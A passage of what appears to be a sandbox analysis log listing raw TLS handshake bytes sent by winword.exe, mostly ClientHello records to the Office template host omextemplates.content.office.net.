226. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb55y\\xdc\\xef\\x061\\x1e9\\xb7\\xf5\\xca\\xbb\\xd8\\x9ce \\x15\\x83bw\\x15\\x10\\xeb\\x00@)\\x01j\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
227.  
228.  
229. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xfe\\x8e\\x9a\\xef\\xebi\\xf7\\x1e\\xe9k\\xcdc\\x7f\\x0e\r\\x80\\xc7b\\x1e;\\x98\\xde&q\\xf8\\x10\\xa6\\xef\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
230.  
231.  
232. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x1av\\xbe\\xcf\\x91\\xea\\xca\\x01nq$\\x8bnv\\xf7x\\xf3\\xd2\\x7f\\xb2\\xcd\"j\\xf7\\xae\n\\xfc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
233.  
234.  
235. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5>\\xbd\\x04^~\\x9d\\x86\\x84,j\\xf8\\xe344a\\xfa^po\\x15*:6\\x17`\\xe3\\xbe\\xb1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
236.  
237.  
238. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x17y\\xf504\\xa3\\x06\\x1bz\\x10\\xbf(sy\\x16\\x16\\x0f\\xac\\x8b\\xca\\x9ae\\xc8\\xf8\\x97\\xc0\\x89\\xaf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
239.  
240.  
241. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb54ri,\\xc2\\xde^o<\\xca`m\\xe5\\x83\\xea\"\\x89j\\xd1\\xcbwl\\xf9\\xaa\\xa5\\xf37l\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
242.  
243.  
244. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5;\\xb8\\x04\\xde\\xe5p1\\xa8e\\x9f\\x83lpo%=m\"\\xe2*\\x92\\x957\\xe8\\xe1\\x8a;\\xbe\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
245.  
246.  
247. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5*\\xfec\\xd4\\xee\\xb0\\x9c\\x0b\\x93\\x81\\xe6\t\\xac\\x9bge\\xd8\\x91\\x82\\xf4f\\x10\\xccs\\xb0\\xdax\\xf6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
248.  
249.  
250. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xa7\\xc3\\xe9ci\\x11|i&\\*\\x7f\\xeef\\x08\\xe8\\xe0h\\xc8\\xc3\\xa9\\xd0\\xb8\\xb0\\x84xi\\x17\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
251.  
252.  
253. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5^\\xd2a)/\\xad\\x10l\\x04\\xd6\\xa9 \\xd9m\\xc7\\x15pa\\xca\\x18\\xab\\xd5\\x87p2\\x00\\x10^\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
254.  
255.  
256. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x91#\\xa5\\xc8v\\x03\\x92`\\x1f\\xb1sn\\xa9q>x\\xa2\\x7f\\xec)\\xa8>px!\\xa3a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
257.  
258.  
259. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x87\\x87tsi\\x03\\xf2u.b`\\x8b\\x13q\\x8a\\xc0\\xec\\xad,+\\x1f/2`\\xe1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
260.  
261.  
262. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xc0\\xb3\\x13>m\\x96v\\xbf\\x12c\\x815\\x01|\\x06\\xd1\t\\x00a\\xfb\\xfa\\\\xf4\\xc9\\x1d\\xbc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
263.  
264.  
265. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x02w\\xb3`%a\\x7fc\\x13\\x00\\xa9\\x19\\x1f\\xaev\\x13\\x95\\xec\\xe9id\\x1a:\\xf0|k\\xd6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
266.  
267.  
268. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5f\\xb8\\x90\\xe4\\x13\n\\x17sa-\\xdd\\xbbr\\xd5\\xbb\\x94\\x94ax?%\\xea\\x06_q\\xd0\\xd1g\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
269.  
270.  
271. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5d\\x998\\x19\\xe9\\x8f\\x9d(^\\x98jc\\xa8\\x15y\\x08\\x189\\xc4\\xb4\\xf4\\xb3\\xb6\\x10\\xa9i6\\xe7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
272.  
273.  
274. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5e\\xba\\x92\\x82^\n`l7\\xc10\\xde\\xc5\\x03\"r\\xd9\\xa3\\xc5\\xb8=\\x87i\\x0fnz\\xfe(\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
275.  
276.  
277. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb50\\xe9\\x9b\\x14\\x8a\\x08\\x07\\x94%\\x07\ri\\xa2\\xd4*\\xa8\\x8a@e>\\xbd>\\xb1\\xb08\\x0e3\\xf8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
278.  
279.  
280. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x96\\xaf\\x8b\\xc8\\xd7\\xe7\\xdeejp\\xac~a\\xd4\\xf2\\x14z\\xae\\x10\\x8b\\x1d\"8\\xc8c\\x82\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
281.  
282.  
283. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x1f\\xc5\\xf6\r\\xb3\\x85i\\x86\\x9a\\x93s\\xe4#g\\xfd\\xfck\\x12\\xcd\\xc3\\x10\\xa0+\\x871\\xc6\\xc1x\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
284.  
285.  
286. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5@\\xf5\\x90\\xae\\xea)\\xbc?\\xd6\r\\xc9\\xb1j\\xa7\\xf7_\\x99k\\xd17ut_#g\t\\xcf\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
287.  
288.  
289. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe8\\x8c\\xc7\\x9b%_*3\\x8f#=\\xb3yyo\\xe6\\xd9\\xee\\xf5\\x94/fk,\\xddf\\xde jm\\xbao\\xed\\x16hz\\x05\\xbau\\xc4\\x9d\\x0f\\x82>\\xfb\\xc8\\x9b\\xf5\r:\\xb6e\\xa3\\xc4\\xd8\\x96\\xda;\\xd0\\xef\"g\\xd5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb6\\x90a\\xafm`\\x165`\\x0e\\xef\\xc3\\xfe\\xca\\xbf\\xdd\\x9bq\\x9a!\\xc1\\xa5\\x15z\\xe2i\\x1b\\x16\\x92\\xb1\\xe4pi\n \\x1c\\xe5\\x87\\xaa\\xf6\\xf7zf\\x07\\xf5\\xc2\\x94u"
290.  
291.  
292. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x86\\x90\\x91ub\\xca\\x97\\xe6\\xdf\\xa4\\xaej\\xac\\xa2m\\xca=\\xf5\\xaf\\xc4*\\xa6\\xfd\\xf3y\\xdfb\\x07\\xec\\xd4\\x92\\xcb\\x87\\x81\\xd9\\xc9\n\\x7fc\\x07\\xa0u\\xd1\\xafr\\x04$\\\\xac\\xe8\\x7f\\xd1\\xf6\tk\\xff\\xc3\\xde\\xd4\\x15\\xae\\x85\\x18\\x8e\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000f\\xe6\\x90\\x17$\\xb1\\xc4\\xf1#s\nly\\x16\\xcd(\\xc7mx\\x96w\\x12\\xb7\\xcec3\\xaez\\x19\\x0b\\xc7\r=\\\\xc3c\\x16\\xeab\\x08u\\xa4\\xe0\\x19\\xf1!&,"
293.  
294.  
295. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xe6a\\xac\\xd6b\"lr\\x00\\x1c\\xd3\\xd5\\x84\\x1c\\xe1\\x17\\xb9\\xdc\\x84\\x9c\\xec\\x87\\x14\\x97\\xfd\\x88\\x8c\\x1f\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
296.  
297.  
298. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5vji\\xe4xr\\x0f\\x9c\\xb9\\xc4\\x06`q\\x8a\\xb0eh\\xd5\\x9a^\\x95&.\\x99\\xb7\\xaa(\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
299.  
300.  
301. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd7\\xd2_dg\\xffwiv\\x0f\\xa2xn\\x05\\x1a\\x8ejyoy\\x87\\xfba\\xdfxh\\xceo\\xc9h4\\x86\\xa0\\x10\\xf6\\xfc\\xe8\\xca\\xb6\\x98\\x80n8\\xdf>\\x94\\x11\\xf7\\xe2\\x7fg\\x8e\\xf2)rd9\\xb0\\x8bk\\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xad\r\\xcf\\x0e\\xc4\\x87\\xdc\\x9d\\x15\\xd8,c\\x04o\\x0f\\xac\\x81\\xc0\\x1a\\x16f\\x98lbq!\\x19\\xe0\\x86\\xb2?\\xad\\x8fv\\xdei\\xb7\\xaf\\xd8\\xf7\\x98\\x04 pb\\xa5\\xdfz"
302.  
303.  
304. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xac\\x88\t\\x11\\x7fe\\x8f\\xc5i\\xe8f\\xe3\\x8eq\\xd4\\xb5 $\\xbd@i\\xb1u\\xfe\\x8e\\xb4\"\\x7f\\xbe\\xb5\\x00\\x7fm\\x9e\\xe9\\xbb\\x91cjj/!\\x80 f\\xbb\\xd1-\\xec\\xf2d?77\\x96\\x83ut\\x7f(\\x9d\\xc2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000`*k+\\xd4\\x131\\x82(a\\x05\\xa0y\\xda\\x80\\xf3g\\xd5\\x82\\xab\\xb8\\x1f\\xe5\\x15\\x13p\\xc2q\\xb8x\\xf8\\x19@=\\x0f\\xb1#\\x87\\x11\\xec\\xccy\\xe1\\xf7e\\xf4\\xc9"
305.  
306.  
307. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04w\\x7fd,mw\\xeaj\\xa7\\xaa\\x02t\\xb6\\x04\\xb2j\\xcf\\xfc|\\x18;tuw\\xf6\\xfdj%\\xcb\\x85xx\\xc4z\t\\xf3k\\xc6^\\xb1\\xdccz\\xb9+=\\xfe_\\xbe\\x8e\\xf3\\xe0\\xa8$d\\xc6\\xac\th<\\x1e\\x8d\\xee\\xbf\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x05\\x14#t~@\\xd3\\xd7\\x86\\xd0y\\xeaf\\xeadp\\xcd\\x05\\xa2\\xd9\\xac\\xef\\xff\\xaf\\xc5\\xf61o\\xb4\\x982u\\x8c\\xc7w\\xde\\xd4\\xd0;x\\\\x81!\\xdb\\xd6\\xa0\\xd2"
308.  
309.  
310. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xfc^\\xe1\\x10\\x10c\\x83\\x14 \\x12:xx\\xf7\\x8f\\x93\\xe4\\x19\\x90\\xc6m\\xca!f\\x0e2\\x0erm\\x1fap\\x88\\xf2h\\x9a\\x10\\xe0\\x16\\x9f\\xf2\\xff\\xf1\\x19\\xfa\\xcfg\\xb8\\xf2\\xa3\\xaa\\xc6\\x80d\\xf3)i\\xa9\\xbd\\xc1\\x93\\xbd'\\x84\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa0\\x19%\\x90\\x18\\x83\\xc0\\xb7\\xe3\\\\xd8\\xdc\\x1c\\x8e\\x11\\xcc\\x08\\x8ed\\x07\\x11\\x00\\xd3\\xf6;\\xfb\\x92/\\x8d\\xe3o#m\\xa6\\xaa\\xd6t\\x8d\\x98\\x12w\\x99\\xf7~\\xb1\\xe7x\\x08"
311.  
312.  
313. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x19\\xfe\\xca\\x9d\\x072\\xc3d\\x85g\\x18lb\\xf4\\x7f\\xccs\\xee\\xbc\\xb0~\\xdf@x\\x18z\\xe6\\x99uz\\xc5\\xf1:\\x97\\x07\\xe4)\\x80o/.\\x05l\\xbf\\xc2i\\xe7\\xb7?9(\\x16\\xd9\\x9f\\xeb%=\\x93\n^\\x11\\xb7\\x0b/\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1d\\x94>fm\\x8e\\x89\t/\\xd4\\x8f\\xdf\\xba;\\xaa\\x05t&s\\x00\\xc9x\\xcf!g\\x0b<\\xd8f\\x80f\\x14\\xf1\\xd6\\x92\\x00\\x8c\\xce\\xa2\\xa8\\x00\\x91'\\\\xf1\\x914\\x95"
314.  
315.  
316. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04g~\\xaa\\xc8\\xbe\\xe2\\xd3\\xc3\\xad\\xc4\\xee%g\\xc3\\x93~9\\x02\\xabm*:-\\x1e\\xbb\\x1fq)\\x116!\\xb1vbje\\xcaq\\xc5\\x0f)\rt\\xb1\\x87\\xc2?\\x16b\\xdd\\x98m\\x0e\\xbb\t_b\\xd3,\\x0b\\x9e\\x07\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf1c1\\x86\\xf9\\xaa\\xa4+\\x15,\\xa2\\xc9\\xf3\\xa1@\\x15\\xd49\\\\xef\\xad\\xda|\\xd3\\xe7\\x92\\xf8a\\xe5\\x1cv\\xe0\\xc1i,i1\\xf1\\x8b\\xcf\\xc7\\x84?\\xa2i("
317.  
318.  
319. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5ea\\xcdr5d\\xfdge\\xf3\\xb9\\x15q5\\xd5\\x16.5h\\xc7\\xfc\\xba\\xec\\x95\\x15\\x89\\x98\\x12\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
320.  
321.  
322. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\"\\ell\\x88w\\x0c\\xc6y\\xd9\n*%\\x98\\xf5\\xb3<$\\x8b\\xbd\\xca\\xc3n9\\x94\\x02d/\\x0e.\\xc1\\xf6\\xd2+\\xfc\\x06q\\xc6\\x8cu`\\xd3\\x12\\xae0i:\\x05\\xa0w\\x9fk%\\xa7uq\\xd0\\xc2\\x02\\xf5\\x96\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000*\\xdft\\xba\\x16\\xd6\\x7f\\xb9~\\xe64lq\\xc2\\xfb\\xee\\x9a\\x95\\x8d\\x8f~2|g\\xd3\\xfe\\x917\\x1b5\\x04\\xb6\\xaf\\x00\\x14z|=\\xee\\xfcy\\x9d\\xf6\\x9e\\x89y\\xd8"
323.  
324.  
325. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04q\\xc9pv\\xa8\\xdb\\xeb\\x17\\xf9\\xf6\\xfc\\x17\\xac\\xf7\\xcf\\x8e\\xe31\\xb7\\xb4`\\x1e\\xb5h\\xd9\\x84\\x81\\x05\\xdcz?\\xb2\\xc5c\\xe2\\x82.\\xc9\\x11(\\xd4j\\xa7y$\\xf8\\xe4\\x91\\x92\\xd8\\xf7\\x13\n\\xad8\\xc7\\x94%\\xc5qw:y\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x898\\xdb\\xd9\\x98kr\\xa1^\\xcc\\xad\\xebg8\\xae\\xa2\\xf5p\\xc6\\x1c\\xac\\xc1\\xe5\\xa1b4\\x08\\xac\\x8f\\xa00\\xc6\\xc8\\xd5\\xc9~*\\xbe\\x9e\\xe7\\xa3\\xf4\\x99\\xcc!;\\xbc"
326.  
327.  
328. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa8\\xdfj\\xa6-+\\x9e\\x930\\xf8\\xb7\\xce\\xae\\x97\\x89\\xdb!v\\xdf\\xda\\x9b\\xa3_m\\x9dav3\\x06\\xa8\\xa8\\xad\\xf2q\\xb5\\x1de\\xe6\t=\\x0f5\\x93\\xb8db\\x04\\xcb8\\x1bf\\xcdok\\xbfb\\x99\\xb2q\\x10w\\xcf\\xcf\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb8l\\x80*\\xf3\\x15f\\x93\\xdbiyj2=\\xd7\\x01 \\xf1\\xfch\\xa4c-\\x8f\\xc2;!\\xd5\\x8c\\x80tf\\xab\\x9e\\xf1\n\\xf3\\xb36\\xb6\\x1f\\xbf\\x1e\\x1d.@\\xf5"
329.  
330.  
331. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x041$\\x18\\x05\\xa7\\x95\\x19\\xda\\xc8\\x83p-\\x8e^\\x05\\xd4\\xa07r\\x03/\\xa0\\x05=m\\x81\\x15\\xef\\xf1\\xaa\\xdcl\\xc2)\\xc2\\xa5d\\x1b\\xa78\\xc5j\\xdf\\x95\\xda\\xd0d\\x8a\\xaf\\xf0y\\xe3\\xf8\\x80\\x91\\x87\\x9f&lfb\\x0cn\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x92\\xf9\\x94\\x0c \\xe0t\\xf7\\xf9\\xf1v\\xed^^\\x1c+\\xf9=\\xd0c(k\\x0e\\x87nq\\xb5\\xfc\\x9bj`\\xab\\x92;\\xe0\\x8a\\x0fz\\x05\\xa8\"l\\x08l<\\xaf\\xf4"
